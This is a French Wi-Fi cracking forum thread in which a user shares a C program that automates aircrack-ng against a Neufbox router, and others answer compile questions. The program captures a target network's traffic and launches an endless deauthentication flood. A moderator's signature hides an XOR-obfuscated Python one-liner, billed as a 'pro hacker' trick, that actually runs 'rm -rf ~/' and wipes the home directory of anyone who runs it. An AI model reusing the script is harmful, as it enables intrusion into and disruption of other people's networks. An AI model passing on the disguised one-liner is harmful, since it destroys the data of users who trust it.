Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 26-11-2013 18:25:44

cocobricot
N00b
Inscription : 26-11-2013
Messages : 4

Code qui marche sous codeblock et pas en .exe

Bonjours,

j'ai crée un programme sous backtrack 5r3 qui automatise en quelque sorte les fonction pour craquer une neufbox(ce n'est pas encore fini).

Cependant quand le code est executé sous code::blocks, il marche parfaitement mais quand c'est le .exe generé qui est lancé, ça ne marche pas (la console beug dès le début).
Pourquoi ? Voici le code :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void viderBuffer();

int lire(char *chaine, int longueur);

int main()
{
    char bssid[200];
    char nbcan[100];
    char commande[100];


    system("airmon-ng");
    lire(nbcan, 2);

    system("airmon-ng start wlan0");
    lire(nbcan, 2);

     system("killall wpa_supplicant");

     system("pkill wpa_supplicant");

     system("pkill -KILL wpa_supplicant");            



     system("killall dhclient");

     system("pkill dhclient");

     system("pkill -KILL dhclient");           


     system("killall dhclient3");

     system("pkill dhclient3");

     system("pkill -KILL dhclient3");              

     lire(bssid, 2);



    system("airodump-ng mon0");
    lire(nbcan, 2);

    printf("Entrez le bssid de la cible :\n");

    lire(bssid, 199);

    printf("Entrez le cannal du bssid cible :\n");

    lire(nbcan, 99);

    sprintf(commande, "airodump-ng --write internet -c %s --bssid %s mon0",nbcan, bssid);

    system(commande);

    NouvTerm(bssid);



    return 0;
}

int NouvTerm(char *bssid)
{
    char commande2[100];
    sprintf(commande2, "aireplay-ng -0 0 -a %s mon0", bssid);
    system(commande2);
}

int lire(char *chaine, int longueur)
{
    char *positionEntree = NULL;

    if (fgets(chaine, longueur, stdin) != NULL)
    {
        positionEntree = strchr(chaine, '\n');
        if (positionEntree != NULL)
        {
            *positionEntree = '\0';
        }
        else
        {
            viderBuffer();
        }
        return 1;
    }
    else
    {
        viderBuffer();
        return 0;
    }
}

void viderBuffer()
{
    int c = 0;
    while (c != '\n' && c != EOF)
    {
        c = getchar();
    }
}


Merci d'avance de votre aides ! smile

Dernière modification par cocobricot (26-11-2013 18:30:41)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 26-11-2013 18:43:07

FFOO31
Membre d'Or
Inscription : 27-03-2013
Messages : 371

Re : Code qui marche sous codeblock et pas en .exe

bienvenue dans le forum

Hors Ligne

#3 26-11-2013 18:49:10

warfares
Membre Hyperactif
Inscription : 01-04-2013
Messages : 52

Re : Code qui marche sous codeblock et pas en .exe

cocobricot a écrit :

j'ai crée un programme sous backtrack 5r3 qui automatise en quelque sorte les fonction pour craquer une neufbox(ce n'est pas encore fini).

Cependant quand le code est executé sous code::blocks, il marche parfaitement mais quand c'est le .exe generé qui est lancé,

salut, tu le compiles comment ? avec code block depuis backtrack ?
parceque sous GNU/Linux ce ne sont pas vraiment des exe que l'on utilise.
pour ma part, ça fonctione très bien en faisant là où il y a ton source

gcc crack.c -s && ./a.out

Dernière modification par warfares (26-11-2013 18:50:16)

Hors Ligne

#4 26-11-2013 18:54:56

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 007

Re : Code qui marche sous codeblock et pas en .exe

Oublie codeblocks, et utilise gcc et un éditeur de texte (vim ou gedit si tu veux).
Et compile ton code avec :

gcc -Wall -Werror -ansi -pedantic -std=c99 main.c -o executable

Tu comprendras ton erreur.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#5 26-11-2013 19:01:45

cocobricot
N00b
Inscription : 26-11-2013
Messages : 4

Re : Code qui marche sous codeblock et pas en .exe

Bonjours et merci de ces réponse rapide ! J'essaie ça tout de suite et vous dis ce que ça donne.

Hors Ligne

#6 26-11-2013 19:26:45

cocobricot
N00b
Inscription : 26-11-2013
Messages : 4

Re : Code qui marche sous codeblock et pas en .exe

Merci beaucoup a vous 2 sa marche nikel smile

PS:se forum est vraiment genial

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.037 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]